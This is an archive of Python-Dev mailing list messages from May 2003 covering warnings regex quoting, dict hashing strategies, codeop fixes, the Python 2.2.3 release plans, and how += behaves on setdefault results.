From fdrake@acm.org  Thu May 15 13:09:57 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 15 May 2003 08:09:57 -0400
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib
 warnings.py,1.19,1.20
In-Reply-To: <200305151107.h4FB75O17039@pcp02138704pcs.reston01.va.comcast.net>
References: <20030515030905.382.60542.Mailman@mail.python.org>
 <16067.6594.326128.398884@nyx.dyndns.org>
 <16067.6925.897980.796041@grendel.zope.com>
 <200305151107.h4FB75O17039@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <16067.33685.659075.459229@grendel.zope.com>

Guido van Rossum writes:
 > Agreed, but you're still using two levels of quoting, and with
 > anything less, "foo.bar" will also match a module named "foolbar".

Agreed.  "foo\.bar" will match "foolbar" as well, but 'foo\.bar' only
matches "foo.bar".  The advantage of single quotes is that you're not
escaping the escape characters with themselves; what's inside the
quotes is simple RE syntax, so you only need to think about one of the
layers at a time.

Either approach works, of course.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From aahz@pythoncraft.com  Thu May 15 13:44:34 2003
From: aahz@pythoncraft.com (Aahz)
Date: Thu, 15 May 2003 08:44:34 -0400
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,1.19,1.20
In-Reply-To: <16067.33685.659075.459229@grendel.zope.com>
References: <20030515030905.382.60542.Mailman@mail.python.org> <16067.6594.326128.398884@nyx.dyndns.org> <16067.6925.897980.796041@grendel.zope.com> <200305151107.h4FB75O17039@pcp02138704pcs.reston01.va.comcast.net> <16067.33685.659075.459229@grendel.zope.com>
Message-ID: <20030515124434.GA20979@panix.com>

On Thu, May 15, 2003, Fred L. Drake, Jr. wrote:
> Guido van Rossum writes:
>> 
>> Agreed, but you're still using two levels of quoting, and with
>> anything less, "foo.bar" will also match a module named "foolbar".
> 
> Agreed.  "foo\.bar" will match "foolbar" as well, but 'foo\.bar' only
> matches "foo.bar".  The advantage of single quotes is that you're not
> escaping the escape characters with themselves; what's inside the
> quotes is simple RE syntax, so you only need to think about one of the
> layers at a time.

The point is that with current behavior you can use foo.bar on the
command line and not worry, because "." is a meta character in neither
shell nor Python.
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

"In many ways, it's a dull language, borrowing solid old concepts from
many other languages & styles:  boring syntax, unsurprising semantics,
few automatic coercions, etc etc.  But that's one of the things I like
about it."  --Tim Peters on Python, 16 Sep 93


From gward@python.net  Thu May 15 14:39:27 2003
From: gward@python.net (Greg Ward)
Date: Thu, 15 May 2003 09:39:27 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: <3EC337A2.7060702@ocf.berkeley.edu>
References: <LNBBLJKPBEHFEDALKOLCEEKEEFAB.tim.one@comcast.net> <3EC337A2.7060702@ocf.berkeley.edu>
Message-ID: <20030515133927.GA15523@cthulhu.gerg.ca>

On 14 May 2003, Brett C. said:
> When I took data structures I was taught that chaining was actually the 
> easiest way to do hash tables and they still had good performance 
> compared to open addressing.  Because of this taught bias I always 
> wondered why Python used open addressing; can someone tell me?

If your nodes are small, chaining has a huge overhead -- an extra
pointer for each node in a chain.  You can play around with glomming
several nodes together to amortize the cost of those pointers, but ISTR
the win isn't that big.

Open addressing is more memory-efficient, but when the hash table fills
(or gets close to full), you absolutely positively have to rehash.

(Back in January, I played around with writing a custom hash table for
keeping ZODB indexes in memory without using a Python dict, so that's
why I'm fairly fresh on hash table minutiae.)

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
NOBODY expects the Spanish Inquisition!


From skip@pobox.com  Thu May 15 15:20:36 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 15 May 2003 09:20:36 -0500
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib
 warnings.py,1.19,1.20
In-Reply-To: <16067.33685.659075.459229@grendel.zope.com>
References: <20030515030905.382.60542.Mailman@mail.python.org>
 <16067.6594.326128.398884@nyx.dyndns.org>
 <16067.6925.897980.796041@grendel.zope.com>
 <200305151107.h4FB75O17039@pcp02138704pcs.reston01.va.comcast.net>
 <16067.33685.659075.459229@grendel.zope.com>
Message-ID: <16067.41524.485389.151519@montanaro.dyndns.org>

    Fred> Guido van Rossum writes:
    >> Agreed, but you're still using two levels of quoting, and with
    >> anything less, "foo.bar" will also match a module named "foolbar".

    Fred> Agreed.  "foo\.bar" will match "foolbar" as well, but 'foo\.bar'
    Fred> only matches "foo.bar".

Coming back to my original question, does it make sense to allow regular
expressions in the message and module fields in a -W command line arg?  The
complexity of all the shell/re quoting suggests not, but having -W args
treated differently than the args to filterwarnings() doesn't seem right.

Perhaps this is something that never happens in practice.  I've never used
-W.  Are there people out there who have used it and wished the message and
module fields could be regular expressions?  Conversely, does anyone make
use of the fact that the message and module args to filterwarnings() can be
regular expressions?

Looking through the Python source I see several examples of filterwarnings()
where one or the other of the message and module args is a regular
expression, so that answers the second question.  The first remains open.

Skip


From guido@python.org  Thu May 15 15:27:58 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 15 May 2003 10:27:58 -0400
Subject: [Python-Dev] Re: [Python-checkins] python/dist/src/Lib warnings.py,1.19,1.20
In-Reply-To: Your message of "Thu, 15 May 2003 09:20:36 CDT."
 <16067.41524.485389.151519@montanaro.dyndns.org>
References: <20030515030905.382.60542.Mailman@mail.python.org> <16067.6594.326128.398884@nyx.dyndns.org> <16067.6925.897980.796041@grendel.zope.com> <200305151107.h4FB75O17039@pcp02138704pcs.reston01.va.comcast.net> <16067.33685.659075.459229@grendel.zope.com>
 <16067.41524.485389.151519@montanaro.dyndns.org>
Message-ID: <200305151427.h4FERwL14363@odiug.zope.com>

>     Fred> Guido van Rossum writes:
>     >> Agreed, but you're still using two levels of quoting, and with
>     >> anything less, "foo.bar" will also match a module named "foolbar".
> 
>     Fred> Agreed.  "foo\.bar" will match "foolbar" as well, but 'foo\.bar'
>     Fred> only matches "foo.bar".
> 
> Coming back to my original question, does it make sense to allow regular
> expressions in the message and module fields in a -W command line arg?  The
> complexity of all the shell/re quoting suggests not, but having -W args
> treated differently than the args to filterwarnings() doesn't seem right.
> 
> Perhaps this is something that never happens in practice.  I've never used
> -W.  Are there people out there who have used it and wished the message and
> module fields could be regular expressions?  Conversely, does anyone make
> use of the fact that the message and module args to filterwarnings() can be
> regular expressions?
> 
> Looking through the Python source I see several examples of filterwarning()
> where one or the other of the message and module args are regular
> expressions, so that answers the second question.  The first remains open.

I'll call YAGNI on regexps for -W.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Thu May 15 15:33:56 2003
From: tim.one@comcast.net (Tim Peters)
Date: Thu, 15 May 2003 10:33:56 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: <3EC337A2.7060702@ocf.berkeley.edu>
Message-ID: <BIEJKCLHCIOIHAGOKOLHEEDKFLAA.tim.one@comcast.net>

[Brett C.]
> When I took data structures I was taught that chaining was actually the
> easiest way to do hash tables and they still had good performance
> compared to open addressing.  Because of this taught bias I always
> wondered why Python used open addressing; can someone tell me?

malloc overhead is a major drag; as my msg said, the feasibility depends on
pymalloc's very low overhead, and that dictentry nodes are 12 bytes apiece
even now; pymalloc didn't exist back then, and Python wasn't originally
micro-optimized as it is now (e.g., there wasn't the current zoo of
dedicated free-lists, or pre-allocation strategies, and dicts could *only*
be indexed by strings, so collision resolution only had to worry about the kinds of
problems a single known hash function was prone to).

> I am interested in seeing how this would pan out, but I am unfortunately
> going to be busy for the next three days (if anyone is going to be at E3
> Thursday or Friday for some odd reason let me know since I will be
> there).  If someone takes this up please let me know; I am interested in
> helping if I can.  Perhaps this should be a sandbox thing?

There's no rush <wink>, and I'd be surprised if Python adopted a different
scheme in the end anyway.  It's likely a just-for-fun to-see-what-happens
project.

Note one nasty class of problem:  in chaining *only* primary collisions
exist.  The current dict implementation turned the problem of
open-addressing's secondary collisions into "a feature", which will become
clear when you contemplate dictobject.c's

    [i << 16 for i in range(20000)]

example.  Python's original dict design didn't have a problem with this
because it used prime numbers for table sizes and reduced 32-bit hashes via
mod-by-a-prime.  The current scheme of just grabbing the last i bits is both
much faster and more delicate than that, and we really rely on the collision
resolution strategy now to protect against unlucky bit patterns.

Another way of looking at this is that the current scheme has a way to get
all 32 bits of a hash code to participate in which table slot gets selected;
mod-by-an-odd-prime also gets all bits into play; peel-off-the-last-i-bits
does not.
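
A quick illustration of the point (made-up snippet):

    keys = [i << 16 for i in range(20000)]
    mask = (1 << 10) - 1                  # pretend the table has 1024 slots
    slots = {}
    for k in keys:
        slots[hash(k) & mask] = 1
    assert len(slots) == 1                # every key wants the very same slot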



From damien.morton@acm.org  Thu May 15 23:25:13 2003
From: damien.morton@acm.org (Damien Morton)
Date: Thu, 15 May 2003 18:25:13 -0400
Subject: [Python-Dev] Simple dicts
Message-ID: <006301c31b30$da69e8e0$6401a8c0@damien>

I'm currently working on an open-chaining dict.  Between paying work and
coming to grips with the Python innards, it might take a little while.

I was working on an implementation optimised for dicts with <256 entries
that attempted to squeeze the most out of memory by using bytes for the
'first' and 'next' pointers. This kind of hashtable can be _extremely_
sparse compared to the current dict implementation. With the
byte-oriented open-chaining approach, the break-even point for memory
usage (compared to the current approach) happens at a max load factor of
about 0.1. 

I'm not sure that an alloc()/free() for each dictentry is a win (if only
because of pymalloc call overhead), and instead imagine a scheme whereby
each dict would pre-alloc() a block of memory and manage its own
free-lists. Theoretically, this makes copying and disposing of dicts
much easier. It also helps ensure locality of reference. In fact,
immediately after a doubling, the open-addressing hashtable scheme still
'uses' (in the sense of potentially addressing) all of the memory
allocated to it, whereas the open-chaining approach 'uses' only the
first pointers and the actual dictentries in use - about 2/3 of the
space the open-addressing scheme uses.

On the other hand, as Tim pointed out to me in a private email, there is
so much overhead in just getting to the hashtable inner loop that going
around that loop one time instead of two or three seems inconsequential.

On the third hand, first-miss and first-hit lookups are simple enough
that they could easily be put into a macro. I will need to take a closer
look at Oren Tirosh's fastnames patch.

I have a question that someone may be able to answer:

There seem to be two different ways to get/set/del from a dictionary.

The first is using PyDict_[Get|Set|Del]Item()

The second is using the embarrassingly named dict_ass_sub() and its
partner dict_subscript().

Which of these two access methods is most likely to be used?



From lkcl@samba-tng.org  Thu May 15 22:44:18 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Thu, 15 May 2003 21:44:18 +0000
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <yu99n0j9gdas.fsf@europa.research.att.com>
References: <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com>
Message-ID: <20030515214417.GF3900@localhost>

On Wed, Apr 02, 2003 at 09:54:35AM -0500, Andrew Koenig wrote:
> Luke> example code:
> Luke> log = {}
> 
> Luke> 	for t in range(5):
> Luke> 		for r in range(10):
> Luke> 			log.setdefault(r, '') += "test %d\n" % t
> 
> Luke> pprint(log)
> 
> Luke> instead, as the above is not possible, the following must be used:
> 
> Luke> from operator import add
> 
> Luke>  ...
> Luke>       ...
> Luke> 	      ...
> 
> Luke> 			add(log.setdefault(r, ''), "test %d\n" % t)
> 
> Luke> ... ARGH!  just checked - NOPE!  add doesn't work.
> Luke> and there's no function "radd" or "__radd__" in the
> Luke> operator module.
> 
> Why can't you do this?
> 
>         for t in range(5):
>                 for r in range(10):
>                         foo = log.setdefault(r,'')
>                         foo += "test %d\n" % t
 
 after running this code,

 log = {0: '', 1: '', 2:'', 3: '' ... 9: ''}

 and foo equals "test 5".

 if, however, you do this:

         for t in range(5):
                 for r in range(10):
                         foo = log.setdefault(r,[])
                         foo.append("test %d\n" % t)
 
 then empirically i conclude that you DO end up with the
 expected results (but is this true all of the time?)

 the reason why your example, andrew, does not work, is
 because '' is a string - a basic type to which a pointer is
 NOT returned.  i presume that the foo += "test %d"... returns a
 DIFFERENT result object, such that the string in the dictionary
 is DIFFERENT from the string result of foo being updated.

 if that makes absolutely no sense whatsoever then think of it
 being the difference between integers and pointers-to-integers
 in c.
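
 purely as an illustration of that difference (made-up snippet, not code
 from anyone's patch):

     log = {}
     s = log.setdefault(0, '')
     s += "test\n"              # rebinds s to a brand-new string
     lst = log.setdefault(1, [])
     lst.append("test\n")       # mutates the very list stored in the dict
     assert log == {0: '', 1: ["test\n"]}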

 
 can anyone tell me if there are any PARTICULAR circumstances where

                         foo = log.setdefault(r,[])
                         foo.append("test %d\n" % t)

 will FAIL to work as expected?



 andrew, sorry it took me so long to respond: i initially
 thought that under all circumstances for all types of foo,
 your example would work.

 l.


-- 
-- 
expecting email to be received and understood is a bit like
picking up the telephone and immediately dialing without
checking for a dial-tone; speaking immediately without listening
for either an answer or ring-tone; hanging up immediately and
then expecting someone to call you (and to be able to call you).
--
every day, people send out email expecting it to be received
without being tampered with, read by other people, delayed or
simply - without prejudice but lots of incompetence - destroyed.
--
please therefore treat email more like you would a CB radio
to communicate across the world (via relaying stations):
ask and expect people to confirm receipt; send nothing that
you don't mind everyone in the world knowing about...


From guido@python.org  Fri May 16 01:27:58 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 15 May 2003 20:27:58 -0400
Subject: [Python-Dev] Simple dicts
In-Reply-To: "Your message of Thu, 15 May 2003 18:25:13 EDT."
 <006301c31b30$da69e8e0$6401a8c0@damien>
References: <006301c31b30$da69e8e0$6401a8c0@damien>
Message-ID: <200305160027.h4G0Rwa17853@pcp02138704pcs.reston01.va.comcast.net>

> There seem to be two different ways to get/set/del from a dictionary.
> 
> The first is using PyDict_[Get|Set|Del]Item()

This is the API that all C code uses (except code that doesn't know
whether it's dealing with dicts or some other mapping, which has to
use PyObject_GetItem() etc, which is even slower).

> The second is using the embarssingly named dict_ass_sub() and its
> partner dict_subscript().

This is what PyObject_GetItem() calls.

> Which of these two access methods is most likely to be used?

That's a hard question.  Maybe a profiler can answer.  The thing is,
there's a lot of C code that calls PyDict_GetItem() directly, e.g. the
attribute lookup code.  But of course there's also a lot of Python
code using dicts.

Yet, I'd bet on PyDict_*().

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri May 16 01:32:19 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 15 May 2003 20:32:19 -0400
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
Message-ID: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>

I'm going on vacation tomorrow; I'll be in Holland for 10 days and
will return to the US on May 26.  I expect to have some email access
but won't use it much.

Now, I'd like Python 2.2.3 to be released soon.  Barry has volunteered
to be the release manager.  I think it's pretty much ready to go out
any time, except that Jeremy mentioned that he has a few things he'd
like to backport; since Jeremy and Barry share an office I'm sure they
can work this out. :-)

I won't be disappointed if 2.2.3 hasn't been released yet when I'm
back, but I won't be surprised if in fact it does go out while I'm
gone -- it's ready, stick a fork in it! :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)



From cnetzer@mail.arc.nasa.gov  Fri May 16 01:56:43 2003
From: cnetzer@mail.arc.nasa.gov (Chad Netzer)
Date: 15 May 2003 17:56:43 -0700
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1053046603.972.31.camel@sayge.arc.nasa.gov>

On Thu, 2003-05-15 at 17:32, Guido van Rossum wrote:

> Now, I'd like Python 2.2.3 to be released soon.  Barry has volunteered
> to be the release manager.

Stupid question.  Where can I get a prerelease (or CVS access) to 2.2.3,
or a list of patches/features applied since 2.2.2?  I looked around for
the info, but apparently not hard enough (or I just don't understand CVS
branching well enough).

Chad




From tim.one@comcast.net  Fri May 16 02:06:27 2003
From: tim.one@comcast.net (Tim Peters)
Date: Thu, 15 May 2003 21:06:27 -0400
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <1053046603.972.31.camel@sayge.arc.nasa.gov>
Message-ID: <LNBBLJKPBEHFEDALKOLCAELMEFAB.tim.one@comcast.net>

[Chad Netzer]
> Stupid question.  Where can I get a prerelease (or CVS access) to 2.2.3,
> or a list of patches/features applied since 2.2.2?  I looked around for
> the info, but apparently not hard enough (or I just don't understand CVS
> branching well enough).

It's not a stupid question, it's a maddening feature of CVS that there's no
place to store meta-data about branches.  What you want to do is pass this
argument to the checkout command:

    -r release22-maint

There's no reasonable way you could have guessed that.  The Misc/NEWS file in
that branch summarizes the changes since 2.2.2 (at least those fixes that
people bothered to make a NEWS entry for <wink>).



From guido@python.org  Fri May 16 02:28:01 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 15 May 2003 21:28:01 -0400
Subject: [Python-Dev] codeop: small details (Q); commit priv request
In-Reply-To: "Your message of Mon, 12 May 2003 16:48:01 +0200."
 <5.2.1.1.0.20030512140727.02362ab0@localhost>
References: <5.2.1.1.0.20030512140727.02362ab0@localhost>
Message-ID: <200305160128.h4G1S1U18083@pcp02138704pcs.reston01.va.comcast.net>

> 1)
> 
> Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)] on win32
> Type "help", "copyright", "credits" or "license" for more information.
>  >>> import codeop
>  >>> codeop.compile_command("",symbol="eval")
> Traceback (most recent call last):
>    File "<stdin>", line 1, in ?
>    File "s:\transit\py23\lib\codeop.py", line 129, in compile_command
>      return _maybe_compile(_compile, source, filename, symbol)
>    File "s:\transit\py23\lib\codeop.py", line 106, in _maybe_compile
>      raise SyntaxError, err1
>    File "<input>", line 1
>      pass
>         ^
> SyntaxError: invalid syntax
> 
> 
> the error is basically an artifact of the logic that enforces:
> 
> compile_command("",symbol="single") === compile_command("pass",symbol="single")
> 
> (this makes typing enter immediately after the prompt at a simulated shell 
> a nop as expected)
> 
> I would expect
> 
> compile_command("",symbol="eval")
> 
> to return None, i.e. to simply signal an incomplete expression (that is 
> what would happen if the code for "eval" case would avoid the cited logic).

Thanks for reporting this.  I've fixed this by avoiding the change to
"pass" when symbol == "eval".

> 2) symbol = "exec" is silently accepted but the documentation intentionally 
> only refers to "exec" and "single" as valid values for symbol. Maybe a 
> ValueError should be raised.

I don't know that that is intentional.  I'd say that, like for the
built-in compile(), the valid values for symbol should be "eval",
"exec", and "single", and the docs ought to be updated (I didn't fix
this).

> Context: I was working on improving Jython codeop compatibility with 
> CPython codeop.

Cool.

> Btw, as considered here by Guido 
> http://sourceforge.net/tracker/index.php?func=detail&aid=645404&group_id=5470&atid=305470
> I would ask to have commit privileges for CPython

Barry has sworn you in by now.  Welcome to the club!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From Anthony Baxter <anthony@interlink.com.au>  Fri May 16 02:47:11 2003
From: Anthony Baxter <anthony@interlink.com.au> (Anthony Baxter)
Date: Fri, 16 May 2003 11:47:11 +1000
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <200305160147.h4G1lCa09066@localhost.localdomain>

>>> Guido van Rossum wrote
> Now, I'd like Python 2.2.3 to be released soon.  Barry has volunteered
> to be the release manager.  I think it's pretty much ready to go out
> any time, except that Jeremy mentioned that he has a few things he'd
> like to backport; since Jeremy and Barry share an office I'm sure they
> can work this out. :-)

There's a bunch of cvs commit messages I've saved off as "potential
branch-patches". I might try to get to them this weekend.


-- 
Anthony Baxter     <anthony@interlink.com.au>   
It's never too late to have a happy childhood.



From barry@python.org  Fri May 16 03:04:57 2003
From: barry@python.org (Barry Warsaw)
Date: 15 May 2003 22:04:57 -0400
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1053050696.26479.35.camel@geddy>

On Thu, 2003-05-15 at 20:32, Guido van Rossum wrote:
> I'm going on vacation tomorrow; I'll be in Holland for 10 days and
> will return to the US on May 26.  I expect to have some email access
> but won't use it much.
> 
> Now, I'd like Python 2.2.3 to be released soon.  Barry has volunteered
> to be the release manager.  I think it's pretty much ready to go out
> any time, except that Jeremy mentioned that he has a few things he'd
> like to backport; since Jeremy and Barry share an office I'm sure they
> can work this out. :-)
> 
> I won't be disappointed if 2.2.3 hasn't been released yet when I'm
> back, but I won't be surprised if in fact it does go out while I'm
> gone -- it's ready, stick a fork in it! :-)

FWIW, I'm going to be around, and am fairly free during the US Memorial
Day weekend 24th - 26th.  Can we shoot for getting a release out that
weekend?  If we can code freeze by the 22nd, I can throw together a
release candidate on Friday (with Tim's help for Windows) and a final by
Monday.

What do you folks think?
-Barry




From fdrake@acm.org  Fri May 16 03:30:07 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 15 May 2003 22:30:07 -0400
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <1053050696.26479.35.camel@geddy>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
 <1053050696.26479.35.camel@geddy>
Message-ID: <16068.19759.176884.680744@grendel.zope.com>

Barry Warsaw writes:
 > FWIW, I'm going to be around, and am fairly free during the US Memorial
 > Day weekend 24th - 26th.  Can we shoot for getting a release out that
 > weekend?  If we can code freeze by the 22nd, I can throw together a
 > release candidate on Friday (with Tim's help for Windows) and a final by
 > Monday.

I'll be away that Friday through Tuesday, and don't expect any kind of
internet/email access.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From barry@python.org  Fri May 16 03:43:09 2003
From: barry@python.org (Barry Warsaw)
Date: 15 May 2003 22:43:09 -0400
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <16068.19759.176884.680744@grendel.zope.com>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
 <1053050696.26479.35.camel@geddy>
 <16068.19759.176884.680744@grendel.zope.com>
Message-ID: <1053052989.26479.39.camel@geddy>

On Thu, 2003-05-15 at 22:30, Fred L. Drake, Jr. wrote:
> Barry Warsaw writes:
>  > FWIW, I'm going to be around, and am fairly free during the US Memorial
>  > Day weekend 24th - 26th.  Can we shoot for getting a release out that
>  > weekend?  If we can code freeze by the 22nd, I can throw together a
>  > release candidate on Friday (with Tim's help for Windows) and a final by
>  > Monday.
> 
> I'll be away that Friday through Tuesday, and don't expect any kind of
> internet/email access.

So can we have all the doc changes in place before then, or should we
freeze on Wednesday?

-Barry




From fdrake@acm.org  Fri May 16 04:03:11 2003
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Thu, 15 May 2003 23:03:11 -0400
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <1053052989.26479.39.camel@geddy>
References: <200305160032.h4G0WJx17890@pcp02138704pcs.reston01.va.comcast.net>
 <1053050696.26479.35.camel@geddy>
 <16068.19759.176884.680744@grendel.zope.com>
 <1053052989.26479.39.camel@geddy>
Message-ID: <16068.21743.727134.815827@grendel.zope.com>

Barry Warsaw writes:
 > So can we have all the doc changes in place before then, or should we
 > freeze on Wednesday?

We can probably have things done; there's only one big thing that
needs to be back-ported in the docs.  (I'm pretty sure we solved a
fonts problem on the trunk; that fix really needs to be back-ported,
but I'll have to spend a little time digging it out.  This is really
reason to separate the documentation processing tools from the doc
tree.)

Normally, the docs distributed with a release candidate are marked as
being for the RC in the versioning; I could build both sets of
packages ahead of time if we get the CVS tagging right.  That would
prevent any changes to the docs after the RC, which should be fine.
We can deal with the mechanics of that next week, to the extent that
anything much needs to happen.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Zope Corporation


From mwh@python.net  Fri May 16 11:47:51 2003
From: mwh@python.net (Michael Hudson)
Date: Fri, 16 May 2003 11:47:51 +0100
Subject: [Python-Dev] Vacation; Python 2.2.3 release.
In-Reply-To: <200305160147.h4G1lCa09066@localhost.localdomain> (Anthony
 Baxter's message of "Fri, 16 May 2003 11:47:11 +1000")
References: <200305160147.h4G1lCa09066@localhost.localdomain>
Message-ID: <2mn0hnyxpk.fsf@starship.python.net>

Anthony Baxter <anthony@interlink.com.au> writes:

>>>> Guido van Rossum wrote
>> Now, I'd like Python 2.2.3 to be released soon.  Barry has volunteered
>> to be the release manager.  I think it's pretty much ready to go out
>> any time, except that Jeremy mentioned that he has a few things he'd
>> like to backport; since Jeremy and Barry share an office I'm sure they
>> can work this out. :-)
>
> There's a bunch of cvs commit messages I've saved off as "potential
> branch-patches". I might try to get to them this weekend.

My python-bugfixes mbox is still online:

    http://starship.python.net/crew/mwh/python-bugfixes

Some of it might still be relevant -- I haven't been that conscientious
about keeping it up to date.

Cheers,
M.

-- 
  The PROPER way to handle HTML postings is to cancel the article,
  then hire a hitman to kill the poster, his wife and kids, and fuck
  his dog and smash his computer into little bits. Anything more is
  just extremism.                                 -- Paul Tomblin, asr


From ark@research.att.com  Fri May 16 13:07:23 2003
From: ark@research.att.com (Andrew Koenig)
Date: 16 May 2003 08:07:23 -0400
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <20030515214417.GF3900@localhost>
References: <20030402090726.GN1048@localhost>
 <yu99n0j9gdas.fsf@europa.research.att.com>
 <20030515214417.GF3900@localhost>
Message-ID: <yu99vfwbf62s.fsf@europa.research.att.com>

ark> Why can't you do this?

ark> for t in range(5):
ark>     for r in range(10):
ark>         foo = log.setdefault(r,'')
ark>         foo += "test %d\n" % t
 
Luke>  after running this code,

Luke>  log = {0: '', 1: '', 2:'', 3: '' ... 9: ''}

Luke>  and foo equals "test 5".

Then that is what foo would be if you were able to write

        log.setdefault(r,'') += "test %d\n" % t

as you had wished.

Luke>  if, however, you do this:

Luke>          for t in range(5):
Luke>                  for r in range(10):
Luke>                          foo = log.setdefault(r,[])
Luke>                          foo.append("test %d\n" % t)
 
Luke>  then empirically i conclude that you DO end up with the
Luke>  expected results (but is this true all of the time?)

I presume that is because you are now dealing with vectors instead
of strings.  In that case, you could also have written

        for t in range(5):
                for r in range(10):
                        foo = log.setdefault(r,[])
                        foo += ["test %d\n" % t]

with the same effect.

Luke>  the reason why your example, andrew, does not work, is
Luke>  because '' is a string - a basic type to which a pointer is
Luke>  NOT returned i presume that the foo += "test %d"... returns a
Luke>  DIFFERENT result object such that the string in the dictionary
Luke>  is DIFFERENT from the string result of foo being updated.

Well, yes.  But that is what you would have gotten had you been allowed
to write

                log.setdefault(r,"") += <whatever>

in the first place.

Luke>  if that makes absolutely no sense whatsoever then think of it
Luke>  being the difference between integers and pointers-to-integers
Luke>  in c.

I think this analogy is pointless, as the only people who will understand
it are those who didn't need it in the first place :-)
 
Luke>  can anyone tell me if there are any PARTICULAR circumstances where

Luke>                          foo = log.setdefault(r,[])
Luke>                          foo.append("test %d\n" % t)

Luke>  will FAIL to work as expected?

It will fail if your expectations are incorrect or unrealistic.

Luke>  andrew, sorry it took me so long to respond: i initially
Luke>  thought that under all circumstances for all types of foo,
Luke>  your example would work.

But it does!  At least in the sense of the original query.

The original query was of the form

        Why can't I write an expression like  f(x) += y?

and my answer was, in effect, 

        If you could, it would have the same effect as if you had written

            foo = f(x)
            foo += y

        and then used the value of foo.

Perhaps I'm missing something, but I don't think that anything you've said
contradicts this answer.
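
Spelled out concretely (a small sketch; the dict and key names here are
invented):

        log = {}
        foo = log.setdefault('k', '')
        foo += "test\n"            # rebinds foo to a new string object
        print repr(log['k'])       # '' -- the dict entry is untouched

        log2 = {}
        foo = log2.setdefault('k', [])
        foo += ["test\n"]          # list.__iadd__ mutates the list in place
        print log2['k']            # ['test\n'] -- the dict entry changed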

-- 
Andrew Koenig, ark@research.att.com, http://www.research.att.com/info/ark


From jepler@unpythonic.net  Fri May 16 13:34:42 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Fri, 16 May 2003 07:34:42 -0500
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <yu99vfwbf62s.fsf@europa.research.att.com>
References: <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com> <20030515214417.GF3900@localhost> <yu99vfwbf62s.fsf@europa.research.att.com>
Message-ID: <20030516123440.GA933@unpythonic.net>

It seems almost within the bounds of possibility that pychecker
could learn to find bugs of the form
    t = expression # t results from computation
    t += i         # inplace op on (immutable/no-__iadd__) t
    del t          # or t otherwise not used before function return
by doing type and liveness analysis on t. (the type analysis being the
hard part)

Is there any time that the described situation would not be a bug?  I
can't see it.
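
A made-up instance of the sort of thing it could catch:

    def greet(d, key):
        msg = d.get(key, "")    # t results from computation
        msg += "!"              # inplace op rebinds the local name only
        return d                # msg never used again -- almost certainly a bug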

Jeff


From lkcl@samba-tng.org  Fri May 16 15:24:51 2003
From: lkcl@samba-tng.org (Luke Kenneth Casson Leighton)
Date: Fri, 16 May 2003 14:24:51 +0000
Subject: [Python-Dev] [PEP] += on return of function call result
In-Reply-To: <yu99vfwbf62s.fsf@europa.research.att.com>
References: <20030402090726.GN1048@localhost> <yu99n0j9gdas.fsf@europa.research.att.com> <20030515214417.GF3900@localhost> <yu99vfwbf62s.fsf@europa.research.att.com>
Message-ID: <20030516142451.GI6196@localhost>

On Fri, May 16, 2003 at 08:07:23AM -0400, Andrew Koenig wrote:
> ark> Why can't you do this?
> 
> ark> for t in range(5):
> ark>     for r in range(10):
> ark>         foo = log.setdefault(r,'')
> ark>         foo += "test %d\n" % t
>  
> Luke>  after running this code,
> 
> Luke>  log = {0: '', 1: '', 2:'', 3: '' ... 9: ''}
> 
> Luke>  and foo equals "test 5".
> 
> Then that is what foo would be if you were able to write
> 
>         log.setdefault(r,'') += "test %d\n" % t
> 
> as you had wished.
 
 hmm...

 ..mmmm...

